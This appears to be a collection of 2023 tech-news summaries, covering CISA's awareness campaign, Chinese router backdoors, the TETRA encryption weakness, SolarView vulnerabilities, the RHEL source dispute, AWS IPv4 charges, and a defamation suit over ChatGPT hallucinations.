Since 2004 October has been designated "Cybersecurity Awareness Month" in America, "a collaborative effort between government and industry to enhance cybersecurity awareness, encourage actions by the public to reduce online risk and generate discussion on cyber threats on a national and global scale."

That's according to America's Cybersecurity and Infrastructure Security Agency (or CISA), the operational lead for federal cybersecurity and national coordinator for critical infrastructure security and resilience (specifically designed for collaboration and partnership). It's why the NSA is publicizing the ten most common cybersecurity misconfigurations in large organizations.

But in addition, for consumers CISA is introducing a new program this year that "promotes behavioral change across the Nation, with a particular focus on how individuals, families and small to medium-sized businesses can Secure Our World by focusing on the four critical actions..." In a video the director of America's cyberdefense agency calls them steps "that everyone can take to stay safe online."

• Use Strong Passwords, "meaning long, random, and unique to each account. And use a password manager to generate and to save them."

• Turn on Multi-Factor Authentication on All Accounts That Offer It. "You need more than a password on your most important accounts, like email, social media, and financial accounts."

• Recognize and Report Phishing. "Be cautious of unsolicited emails, texts, or calls asking you for personal information, and don't click on links or open attachments from unknown sources.

• Update Your Software. "In fact, enable automatic updates on your software, so the latest security patches just keep your devices continuously up-to-date."

The video ends by noting CISA is asking tech companies and software developers to create products that are "secure by design."

"And let's secure our families by ensuring that our loved ones know what to look for and how to stay safe online."

Tom Perkins writes via The Guardian: Almost half of a federal government panel that helps develop US nutritional guidelines has significant ties to big agriculture, ultra-processed food companies, pharmaceutical companies and other corporate organizations with a significant stake in the process's outcome. The revelation is part of a new report from US Right to Know, a government transparency group that looked for ties to corporate interests among the 20-member panel of food and nutrition experts that makes recommendations for updating the US government's official dietary guidelines.

It found nine members had ties to Nestle, Pfizer, Coca-Cola, the National Egg Board and other prominent food lobby groups, among others. The findings raise questions about whether the panel is looking out for Americans' health or corporate profits, and "erodes confidence in dietary guidelines," said Gary Ruskin of US Right to Know. "Millions of Americans' lives are affected by this report and it's crucial that the report tell the truth to American people and it's not degraded into another sales pitch for big food and big pharma," he said. [...]

"The guidelines affect the entire US food system quite strongly," Ruskin said. US Right to Know scoured public records dating back five years for conflicts of interest among the 20 panel members. In addition to the nine it found with "high-risk conflicts of interest" and connections to the food and drug industry, it found four more members who have possible conflicts of interest. It applauded the agencies for appointing seven members who did not appear to have any conflicts. At least four panelists have connections to at least two companies each among Abbott, Novo Nordisk, the National Dairy Council, Eli Lilly and Weight Watchers International. One panel member has received about $240,000 in grant funding from Eli Lilly.

An anonymous reader quotes a report from Ars Technica: Hackers backed by the Chinese government are planting malware into routers that provides long-lasting and undetectable backdoor access to the networks of multinational companies in the US and Japan, governments in both countries said Wednesday. The hacking group, tracked under names including BlackTech, Palmerworm, Temp.Overboard, Circuit Panda, and Radio Panda, has been operating since at least 2010, a joint advisory published by government entities in the US and Japan reported. The group has a history of targeting public organizations and private companies in the US and East Asia. The threat actor is somehow gaining administrator credentials to network devices used by subsidiaries and using that control to install malicious firmware that can be triggered with "magic packets" to perform specific tasks.

The hackers then use control of those devices to infiltrate networks of companies that have trusted relationships with the breached subsidiaries. "Specifically, upon gaining an initial foothold into a target network and gaining administrator access to network edge devices, BlackTech cyber actors often modify the firmware to hide their activity across the edge devices to further maintain persistence in the network," officials wrote in Wednesday's advisory. "To extend their foothold across an organization, BlackTech actors target branch routers -- typically smaller appliances used at remote branch offices to connect to a corporate headquarters -- and then abuse the trusted relationship of the branch routers within the corporate network being targeted. BlackTech actors then use the compromised public-facing branch routers as part of their infrastructure for proxying traffic, blending in with corporate network traffic, and pivoting to other victims on the same corporate network."

Most of Wednesday's advisory referred to routers sold by Cisco. In an advisory of its own, Cisco said the threat actors are compromising the devices after acquiring administrative credentials and that there's no indication they are exploiting vulnerabilities. Cisco also said that the hacker's ability to install malicious firmware exists only for older company products. Newer ones are equipped with secure boot capabilities that prevent them from running unauthorized firmware, the company said. "It would be trivial for the BlackTech actors to modify values in their backdoors that would render specific signatures of this router backdoor obsolete," the advisory stated. "For more robust detection, network defenders should monitor network devices for unauthorized downloads of bootloaders and firmware images and reboots. Network defenders should also monitor for unusual traffic destined to the router, including SSH."

To detect and mitigate this threat, the advisory recommends administrators disable outbound connections on virtual teletype (VTY) lines, monitor inbound and outbound connections, block unauthorized outbound connections, restrict administration service access, upgrade to secure boot-capable devices, change compromised passwords, review network device logs, and monitor firmware changes for unauthorized alterations.

Ars Technica notes: "The advisory didn't provide any indicators of compromise that admins can use to determine if they have been targeted or infected."

70 million Americans live in a county without a newspaper, according to a 2022 report cited in this editorial by the Washington Post's editorial board"

Who's to blame? The internet, mostly. Whereas deep-pocketed advertisers formerly relied on newspapers to reach their customers, they took to the audience-targeting capabilities of Facebook or Google. Web-based marketplaces also siphoned newspapers' once-robust revenue from classified ads.
But the Post emphasizes one positive new development: "a large pile of cash." In an initiative announced this month, 22 donor organizations, including the Knight Foundation and the John D. and Catherine T. MacArthur Foundation, are teaming up to provide more than $500 million to boost local news over five years — an undertaking called Press Forward... The injection of more than a half-billion dollars is sure to help the quest for a durable and replicable business model.

The even bigger imperative, however, is to elevate local news on the philanthropic food chain so that national and hometown funders prioritize this pivotal American institution. Failure on this front places more pressure on public policy solutions, and government activism mixes poorly with independent journalism...

One of the goals for Press Forward, accordingly, is building out the infrastructure — "from legal support to membership programs" — relied upon by local news providers to deliver their product. Jim Brady, vice president of journalism at the Knight Foundation, says it's easier than ever for news entrepreneurs to launch a local site because they can plug into existing technologies hammered out by their predecessors — and there's more development work still to fund on this front.

So where to go from here? Local philanthropic interests across the country could take a cue from the Press Forward partners and invest in the news organizations down the street.

From an EFF announcement this week: Technical standards like fire and electrical codes developed by private organizations but incorporated into public law can be freely disseminated without any liability for copyright infringement, a federal appeals court ruled Tuesday.
The judge ruled that posting the materials constituted fair use — so the nonprofit group doing the posting won't be liable for copyright infringement. The American Bar Association Journal reports: The decision is a victory for public-domain advocate Carl Malamud and the group that he founded, Public.Resource.org. The group posts legal materials on its websites, including the standards developed by the three organizations that sued... "It has been over 10 years since plaintiffs filed suit in this case," said Malamud in a press release by the Electronic Frontier Foundation. "The U.S. Court of Appeals has found decisively in favor of the proposition that citizens must not be relegated to economy-class access to the law."
In 2012 Carl Malamud answered questions from Slashdot readers.

And now, finally, from the EFF's announcement: Tuesday's ruling by a three-judge panel of the U.S. Court of Appeals for the District of Columbia Circuit upholds the idea that our laws belong to all of us, and we should be able to find, read, and share them free of registration requirements, fees, and other roadblocks... "In a nation governed by the rule of law, private parties have no business controlling who can read, share, and speak the rules to which we are all subject," EFF Legal Director Corynne McSherry said. "We are pleased that the Court of Appeals upheld what other U.S. courts, including the Supreme Court, have said for almost 200 years: No one should control access to the law."
Or, as the EFF puts it on another page, "Copyright cannot trump the essential public interest..."

Thanks to long-time Slashdot reader schwit1 for sharing the news.

Some of the world's leading astronomical observatories have reported cyberattacks that have resulted in temporary shutdowns. Space.com reports: The National Science Foundation's National Optical-Infrared Astronomy Research Laboratory, or NOIRLab, reported that a cybersecurity incident that occurred on Aug. 1 has prompted the lab to temporarily halt operations at its Gemini North Telescope in Hawaii and Gemini South Telescope in Chile. Other, smaller telescopes on Cerro Tololo in Chile were also affected. "Our staff are working with cybersecurity experts to get all the impacted telescopes and our website back online as soon as possible and are encouraged by the progress made thus far," NOIRLab wrote in a statement on its website on Aug. 24.

It's unclear exactly what the nature of the cyberattacks were or from where they originated. NOIRLab points out that because the investigation is still ongoing, the organization will be cautious about what information it shares about the intrusions. The cyberattacks on NOIRLab's facilities occurred just days before the United States National Counterintelligence and Security Center (NCSC) issued a bulletin (PDF) advising American space companies and research organizations about the threat of cyberattacks and espionage.

Foreign spies and hackers "recognize the importance of the commercial space industry to the U.S. economy and national security, including the growing dependence of critical infrastructure on space-based assets," the bulletin stated. "They see US space-related innovation and assets as potential threats as well as valuable opportunities to acquire vital technologies and expertise."

"Terraform, arguably the most popular Infrastructure as Code products, has been forked after the parent company HashiCorp changed its license from the Mozilla Public License (MPL) to the Business Source License v1.1 (BSL)," writes long-time Slashdot reader ochinko. "Our view is that we're actually not the fork because we're just changing the name but it's the same project under the same license," Sebastian Stadil, co-founder and CEO of DevOps automation biz Scalr told The Register. "Our position is that the fork is actually HashiCorp that has forked its own projects under a different license." From the report: HashiCorp's decision to issue new licensing terms for its software follows a path trodden by numerous other organizations formed around open source projects to limit what competitors can do with project code. As the biz acknowledged in its statement about the transition, firms like Cockroach Labs, Confluent Sentry, Couchbase, Elastic, MariaDB, MongoDB, and Redis Labs have similarly adopted less-permissive software licenses to create a barrier for competitors. You can see the OpenTF manifesto here.

In a lengthy blog post today, the open-source internet chess server, Lichess, announced they will formally end all cooperation with both the U.S. Chess Federation and Saint Louis University Chess Club (STLCC), citing two high-profile, sexual misconduct cases involving grandmasters Alejandro Ramirez and Timur Gareyev. Here's a brief summary of the issue: In February, chess commentator and author Jennifer Shahade publicly accused grandmaster Alejandro Ramirez of sexual misconduct. Her allegations sparked a swift and severe backlash against Ramirez, who was forced to resign from the Saint Louis Chess Club (STLCC), before being permanently banned by the United States Chess Federation (US Chess). The allegations also exposed apparent failures at US Chess and STLCC. Yet, neither organization has faced any serious scrutiny or accountability for their handling of the case.

And Ramirez is not the only one. According to interviews and documents reviewed by Lichess, one other prominent American grandmaster has also been accused of sexual misconduct by multiple women, raising further troubling questions about how chess organizations deal with such matters.

Lichess has decided to stop cooperating with both organizations due to serious concerns about their accountability. We will not provide them with support, and we will not advertise their events. Women and girls in chess already face an uphill battle. They deserve a safe and supportive environment. But too often, they encounter abuse, harassment or worse. And too often, they feel powerless to report it or seek justice. It's time to help break the silence. Lichess urges US Chess and STLCC "to publicly acknowledge their past mistakes, be more open with the public, and hold those who engage in misconduct accountable."

While they acknowledge US Chess has taken some steps to improve its processes, Lichess said "both US Chess and STLCC have failed to demonstrate an important aspect of accountability -- a willingness to acknowledge and address past shortcomings." They added: "We do not think that reconciliation will be possible without this acknowledgement."

In a groundbreaking move, CIQ, Oracle, and SUSE have come together to announce the formation of the Open Enterprise Linux Association (OpenELA). From a report: The goal of this new collaborative trade association is to foster "the development of distributions compatible with Red Hat Enterprise Linux (RHEL) by providing open and free enterprise Linux source code."

The inception of OpenELA is a direct response to Red Hat's recent alterations to RHEL source code availability. This new Delaware 501(c)(6) US nonprofit association will provide an open process for organizations to access source code. This will enable it to build RHEL-compatible distributions. The initiative underscores the importance of community-driven source code, which serves as a foundation for creating compatible distributions.

Mike McGrath, Red Hat's vice president of Red Hat Core Platforms, sparked this when he announced Red Hat would be changing how users can access RHEL's source code. For the non-Hatters among you, Core Platforms is the division in charge of RHEL. McGrath wrote, "CentOS Stream will now be the sole repository for public RHEL-related source code releases. For Red Hat customers and partners, source code will remain available via the Red Hat Customer Portal."

This made it much more difficult for RHEL clone vendors, such as AlmaLinux, Rocky Linux, and Oracle Linux, to create perfect RHEL variant distributions. AlmaLinux elected to try to work with Red Hat's new source code rules. Oracle restarted its old fighting ways with IBM/Red Hat; SUSE announced an RHEL-compatible distro fork plan; and Rocky Linux found new ways to obtain RHEL code. Now the last two, along with CIQ, which started Rocky Linux, have joined forces.

Kenya's Ministry of the Interior has issued a decree suspending Worldcoin enrollment in the country, citing concerns with the "authenticity and legality" of its activities in the areas of security, financial services and data protection. TechCrunch reports: The suspension covers both Worldcoin and "any other entity that may be similarly engaging the people of Kenya" and will remain in place until the authorities determine "the absence of any risks to the general public whatsoever." Up until today, Kenya had one of the largest collections of venues -- at least 18, according to the company's directory last week -- where you could visit an "Orb," as the company's spherical and mirrored iris scanners are called, "and verify your World ID." Now there is only one listed -- after Orb operators, overwhelmed by the huge turnout, shifted their stations on Sunday to Kenyatta International Convention Centre (KICC), a bigger ground in Kenya's capital that could accommodate the thousands of people streaming in.

"Relevant security, financial service and data protection agencies have commenced inquiries and investigations to establish the authenticity and legality of the aforesaid activities, and the safety and protection of the data being harvested, and how the harvesters intend to use the data," said Kithure Kindiki, Kenya's cabinet secretary for the ministry of interior and national administration. The news come amid separate reports that Worldcoin plans to expand its operations to sign up more users globally and allow other organizations to use its iris-scanning and identity-verifying technology.

Further reading: Sam Altman's Worldcoin Eyeball-Scanning Crypto Project Launches

Long-time Slashdot reader nairnr shares a report from The Register: Cloud giant AWS will start charging customers for public IPv4 addresses from next year, claiming it is forced to do this because of the increasing scarcity of these and to encourage the use of IPv6 instead. It is now four years since we officially ran out of IPv4 ranges to allocate, and since then, those wanting a new public IPv4 address have had to rely on address ranges being recovered, either from from organizations that close down or those that return addresses they no longer require as they migrate to IPv6.

If Amazon's cloud division is to be believed, the difficulty in obtaining public IPv4 addresses has seen the cost of acquiring a single address rise by more than 300 percent over the past five years, and as we all know, the business is a little short of cash at the moment, so is having to pass these costs on to users. "This change reflects our own costs and is also intended to encourage you to be a bit more frugal with your use of public IPv4 addresses and to think about accelerating your adoption of IPv6 as a modernization and conservation measure,' writes AWS Chief Evangelist Jeff Barr, on the company news blog.

The update will come into effect on February 1, 2024, when AWS customers will see a charge of $0.005 (half a cent) per IP address per hour for all public IPv4 addresses. These charges will apparently apply whether the address is attached to a service or not, and like many AWS charges, appear inconsequential at first glance but can mount up over time if a customer is using many of them. These charges will apply to all AWS services including EC2, Relational Database Service (RDS) database instances, Elastic Kubernetes Service (EKS) nodes, and will apply across all AWS regions, the company said. However, customers will not be charged for IP addresses that they own and bring to AWS using Amazon's BYOIP feature. AWS offers a free tier for EC2, and this will include 750 hours of public IPv4 address usage per month for the first 12 months, starting from the same date the charges do.

It isn't just software companies looking to enter the generative AI fray. Dell, the PC maker, is going all in on generative AI and offering hardware to run powerful models and a new platform to help organizations get started. From a report:The company released what it calls Dell Generative AI Solutions for clients to set up access to large language models and create generative AI projects. The company will offer new hardware setups, a managed service platform, and computers to run generative AI projects faster.

Dell is known for releasing laptops and monitors, but the company also produces server racks and other enterprise hardware. While the more public face of the AI arms race is between developers of large language models like Meta, OpenAI, and Google, another group of tech companies is looking into how to cash in on the technology. From hardware providers to cloud providers, everyone believes they need an AI service to keep up as clients want to add more AI capabilities to their businesses.

A group of cybersecurity researchers has uncovered what they believe is an intentional backdoor in encrypted radios used by police, military, and critical infrastructure entities around the world. The backdoor may have existed for decades, potentially exposing a wealth of sensitive information transmitted across them, according to the researchers. From a report: While the researchers frame their discovery as a backdoor, the organization responsible for maintaining the standard pushes back against that specific term, and says the standard was designed for export controls which determine the strength of encryption. The end result, however, are radios with traffic that can be decrypted using consumer hardware like an ordinary laptop in under a minute. "There's no other way in which this can function than that this is an intentional backdoor," Jos Wetzels, one of the researchers from cybersecurity firm Midnight Blue, told Motherboard in a phone call.

The research is the first public and in-depth analysis of the TErrestrial Trunked RAdio (TETRA) standard in the more than 20 years the standard has existed. Not all users of TETRA-powered radios use the specific encryption algorithim called TEA1 which is impacted by the backdoor. TEA1 is part of the TETRA standard approved for export to other countries. But the researchers also found other, multiple vulnerabilities across TETRA that could allow historical decryption of communications and deanonymization. TETRA-radio users in general include national police forces and emergency services in Europe; military organizations in Africa; and train operators in North America and critical infrastructure providers elsewhere.

An anonymous reader quotes a report from The Toronto Star: Nassir the gorilla, languid in the heat of a summer afternoon, sits just within reach of a faded sign taped to the glass of his enclosure at the Toronto Zoo, advising visitors not to share images on their cellphones with the swinging bachelor. "We've had a lot of members and guests that actually will put their phones up to the glass and show him videos," says Maria Franke, the zoo's director of wildlife conservation and welfare. "And Nassir is so into those videos. It was causing him to be distracted and not interacting with the other gorillas, and you know, being a gorilla. He was just so enthralled with gadgets and phones and the videos."

Gorillas, it seems, share more than just 98 per cent of our DNA. Zookeepers have discovered they can become every bit as interested in cellphones as the bipedal visitors who pay to see them. [...] Biologist Rob Laidlaw sees animal interest in technology as a manifestation of their need for stimulation -- a result of the boredom they experience in captivity. He says keeping such animals stimulated is a huge challenge, even for sanctuary organizations that provide sprawling enclosures. "They're looking for any opportunity they can find to engage intellectually," said Laidlaw, a chartered biologist and executive director of Zoocheck, an animal protection organization. Laidlaw says technology has its uses in zoos, but the emphasis needs to remain on providing as many animals as possible with environments that are as close to their native habitats as possible. "My fear is always that people see these things and think they're a panacea when in fact they're not. They're just one little tiny facet of relieving the boredom of animals."

As most teenagers do, Nassir seems to have grown out of his preoccupation with cellphones, says Franke. He is strongly bonded to his half-brother, Sadiki, who shares the zoo's rainforest habitat with him. "It's like Nassir was a little boy, all he wanted to to do was sit in the basement and play games on the computer," said Franke. "I'm not really sure what the content of the videos was. Was it gorillas in the wild? I have no idea. Was it a cartoon? I have no idea. But obviously, there was something that was attracting him to it." But just in case he isn't quite over it, the note to the public remains up -- for now.

A Bangladeshi government website leaked the personal information of citizens, including full names, phone numbers, email addresses and national ID numbers. TechCrunch reports: Viktor Markopoulos, a researcher who works for Bitcrack Cyber Security, said he accidentally discovered the leak on June 27, and shortly after contacted the Bangladeshi e-Government Computer Incident Response Team (CERT). He said the leak includes data of millions of Bangladeshi citizens. TechCrunch was able to verify that the leaked data is legitimate by using a portion to query a public search tool on the affected government website. By doing this, the website returned other data contained in the leaked database, such as the name of the person who applied to register, as well as -- in some cases -- the name of their parents. We attempted this with 10 different sets of data, which all returned correct data.

TechCrunch is not naming the government website because the data is still available online, according to Markopoulos, and we haven't heard back from any of the Bangladeshi government organizations that we emailed asking for comment and alerting of the data exposure. In Bangladesh, every citizen aged 18 and older is issued a National Identity Card, which assigns a unique ID to every citizen. The card is mandatory and gives citizens access to several services, such as getting a driver's license, passport, buying and selling land, opening a bank account, and others.

Markopoulos said finding the data "was too easy." "It just appeared as a Google result and I wasn't even intending on finding it. I was Googling an SQL error and it just popped up as the second result," he told TechCrunch, referring to SQL, a language designed for managing data in a database. The exposure of email addresses, phone numbers and national ID card numbers is bad on its own, but Markopoulos said that having this type of information could also "be used in the web application to access, modify, and/or delete the applications as well as view the Birth Registration Record Verification."

An anonymous reader quotes a report from Ars Technica: Hundreds of Internet-exposed devices inside solar farms remain unpatched against a critical and actively exploited vulnerability that makes it easy for remote attackers to disrupt operations or gain a foothold inside the facilities. The devices, sold by Osaka, Japan-based Contec under the brand name SolarView, help people inside solar facilities monitor the amount of power they generate, store, and distribute. Contec says that roughly 30,000 power stations have introduced the devices, which come in various packages based on the size of the operation and the type of equipment it uses.

Searches on Shodan indicate that more than 600 of them are reachable on the open Internet. As problematic as that configuration is, researchers from security firm VulnCheck said Wednesday, more than two-thirds of them have yet to install an update that patches CVE-2022-29303, the tracking designation for a vulnerability with a severity rating of 9.8 out of 10. The flaw stems from the failure to neutralize potentially malicious elements included in user-supplied input, leading to remote attacks that execute malicious commands. Security firm Palo Alto Networks said last month the flaw was under active exploit by an operator of Mirai, an open source botnet consisting of routers and other so-called Internet of Things devices. The compromise of these devices could cause facilities that use them to lose visibility into their operations, which could result in serious consequences depending on where the vulnerable devices are used.

"The fact that a number of these systems are Internet facing and that the public exploits have been available long enough to get rolled into a Mirai-variant is not a good situation," VulnCheck researcher Jacob Baines wrote. "As always, organizations should be mindful of which systems appear in their public IP space and track public exploits for systems that they rely on." Baines said that the same devices vulnerable to CVE-2022-29303 were also vulnerable to CVE-2023-23333, a newer command-injection vulnerability that also has a severity rating of 9.8. Although there are no known reports of it being actively exploited, exploit code has been publicly available since February. Incorrect descriptions for both vulnerabilities are one factor involved in the patch failures, Baines said. Both vulnerabilities indicate that SolarView versions 8.00 and 8.10 are patched against CVE-2022-29303 and CVE-2023-293333. In fact, the researcher said, only 8.10 is patched against the threats.

"CentOS Stream will now be the sole repository for public RHEL-related source code releases..." Red Hat posted this week on its blog, arguing that "The engagement around CentOS Stream, the engineering levels of investment, and the new priorities we're addressing for customers and partners now make maintaining separate, redundant, repositories inefficient."

Long-time Slashdot reader slack_justyb notes this means patches and changes will now hit CentOS Stream before actually hitting RHEL, which "will make it difficult for other distributions such as Alma Linux, Rocky Linux, and Oracle Linux to provide assured binary compatibility as their only source now will be ahead of what RHEL is actually using."

"Some commentators are pointing out that it's possible to sign up for a free Red Hat Developer account, and obtain the source code legitimately that way," writes the Register. "This is perfectly true, but the problem is that the license agreement that you have to sign to get that account prevents you from redistributing the software." Hackaday notes that beyond the the GPL v2 license on the kernel, Red Hat also has "an additional user agreement that terminates access to updates if the code is re-published."

Rocky Linux officially "remains confident in its ability to continue as a bug-for-bug compatible and freely available alternative to Red Hat Enterprise Linux, despite changes in accessibility." While this decision does change the automation we use for building Rocky Linux, we have already created a short term mitigation and are developing the longer term strategy. There will be no disruption or change for any Rocky Linux users, collaborators, or partners... The project pledges to keep its promise to maintain the full life-span of support for Rocky 8 and 9, and to continue to produce future RHEL-compatible versions as long as the option remains, allowing organizations to maintain the flexibility, control, and freedom they rely upon for their critical infrastructure. This is the open source way.
Gregory Kurtzer, founder of the Rocky Linux project, calls Red Hat's move "a minor inconvenience for the Rocky Linux team," but with "no disruption to Rocky Linux users. Moving forward we are becoming even more stable, supported, and secure."

AlmaLinux also weighs in: Can you just use CentOS Stream sources?
No, we are committed to remaining a downstream RHEL clone, and using CentOS Stream sources would make us upstream of RHEL. CentOS Stream sources, while being upstream of RHEL, do not always include all patches and updates that are included in RHEL packages.

Is Red Hat trying to kill downstream clones?
We cannot speak to Red Hat's intentions, and can only point to the things they have said publicly. We have had an incredible working relationship with Red Hat through the life of AlmaLinux OS and we hope to see that continue.

An anonymous reader quotes a report from TechCrunch: European regulators are at a crossroads over how AI will be regulated -- and ultimately used commercially and non-commercially -- in the region, and today the EU's largest consumer group, the BEUC, weighed in with its own position: stop dragging your feet, and "launch urgent investigations into the risks of generative AI" now, it said. "Generative AI such as ChatGPT has opened up all kinds of possibilities for consumers, but there are serious concerns about how these systems might deceive, manipulate and harm people. They can also be used to spread disinformation, perpetuate existing biases which amplify discrimination, or be used for fraud," said Ursula Pachl, Deputy Director General of BEUC, in a statement. "We call on safety, data and consumer protection authorities to start investigations now and not wait idly for all kinds of consumer harm to have happened before they take action. These laws apply to all products and services, be they AI-powered or not and authorities must enforce them."

The BEUC, which represents consumer organizations in 13 countries in the EU, issued the call to coincide with a report out today (PDF) from one of its members, Forbrukerradet in Norway. That Norwegian report is unequivocal in its position: AI poses consumer harms (the title of the report says it all: "Ghost in the Machine: addressing the consumer harms of generative AI") and poses numerous problematic issues. It highlights, for example, how "certain AI developers including Big Tech companies" have closed off systems from external scrutiny making it difficult to see how data is collected or algorithms work; the fact that some systems produce incorrect information as blithely as they do correct results, with users often none the wiser about which it might be; AI that's built to mislead or manipulate users; the bias issue based on the information that is fed into a particular AI model; and security, specifically how AI could be weaponized to scam people or breach systems. [...]

The AI Law, when implemented, will be the world's first attempt to try to codify some kind of understanding and legal enforcement around how AI is used commercially and non-commercially. The next step in the process is for the EU to engage with individual countries in the EU to hammer out what final form the law will take -- specifically to identify what (and who) would fit into its categories, and what will not. The question will be in how readily different countries agree together. The EU wants to finalize this process by the end of this year, it said. "It is crucial that the EU makes this law as watertight as possible to protect consumers," said Pachl in her statement. "All AI systems, including generative AI, need public scrutiny, and public authorities must reassert control over them. Lawmakers must require that the output from any generative AI system is safe, fair and transparent for consumers."

Millions of people in Louisiana and Oregon have had their data compromised in the sprawling cyberattack that has also hit the US federal government, state agencies said late Thursday. From a report: The breach has affected 3.5 million Oregonians with driver's licenses or state ID cards, and anyone with that documentation in Louisiana, authorities said. The Louisiana governor's office did not put a number on the number of victims but over 3 million Louisianians hold driver's licenses, according to public data. The states did not blame anyone in particular for the hack, but federal officials have attributed a broader hacking campaign using the same software vulnerability to a Russian ransomware gang. The sweeping hack has likely exposed data at hundreds of organizations across the globe and also compromised multiple US federal agencies, including the Department of Energy, as well as data from major corporations in Britain like the BBC and British Airways. The Russian-speaking hackers that claimed credit are known to demand multimillion-dollar ransoms, though US and state governments say they have not received any demands.

OpenAI is facing a defamation lawsuit filed by Mark Walters, who claims that the AI platform falsely accused him of embezzling money from a gun rights group in statements delivered to a journalist. The lawsuit argues that ChatGPT is guilty of libel and alleges that the AI system "hallucinated" and generated false information about Walters. The Register reports: "While research and development of AI is worthwhile, it is irresponsible to unleash a system on the public that is known to make up 'facts' about people," his attorney John Monroe told The Register. According to the complaint, a journalist named Fred Riehl, while he was reporting on a court case, asked ChatGPT for a summary of accusations in a complaint, and provided ChatGPT with the URL of the real complaint for reference. (Here's the actual case [PDF] the reporter was trying to save time on reading for those curious.)

What makes the situation even odder is that the case Riehl was reporting on was actually filed by a group of several gun rights groups against Washington's Attorney General's office (accusing officials of "unconstitutional retaliation", among other things, while investigating the groups and their members) and had nothing at all to do with financial accounting claims. When Riehl asked for a summary, instead of returning accurate information, or so the case alleges, ChatGPT "hallucinated" that Mark Walters' name was attached to a criminal complaint -- and moreover, that it falsely accused him of embezzling money from The Second Amendment Foundation, one of the organizations suing the Washington Attorney General in the real complaint.

ChatGPT is known to "occasionally generate incorrect information" -- also known as hallucinations, as The Register has extensively reported. The AI platform has already been accused of writing obituaries for folks who are still alive, and in May this year, of making up fake legal citations pointing to non-existent prior cases. In the latter situation, a Texas judge said his court would strike any filing from an attorney who failed to certify either that they didn't use AI to prepare their legal docs, or that they had, but a human had checked them. [...] According to the complaint, Riehl contacted Alan Gottlieb, one of the plaintiffs in the actual Washington lawsuit, about ChatGPT's allegations concerning Walters, and Gottlieb confirmed that they were false. None of ChatGPT's statements concerning Walters are in the actual complaint.

The false answer ChatGPT gave Riehl alleged that Walters was treasurer and Chief Financial Officer of SAF and claimed he had "embezzled and misappropriated SAF's funds and assets." When Riehl asked ChatGPT to provide "the entire text of the complaint," it returned an entirely fabricated complaint, which bore "no resemblance to the actual complaint, including an erroneous case number." Walters is looking for damages and lawyers' fees. We have asked his attorney for comment. As for the amount of damages, the complaint says these will be determined at trial, if the case actually gets there.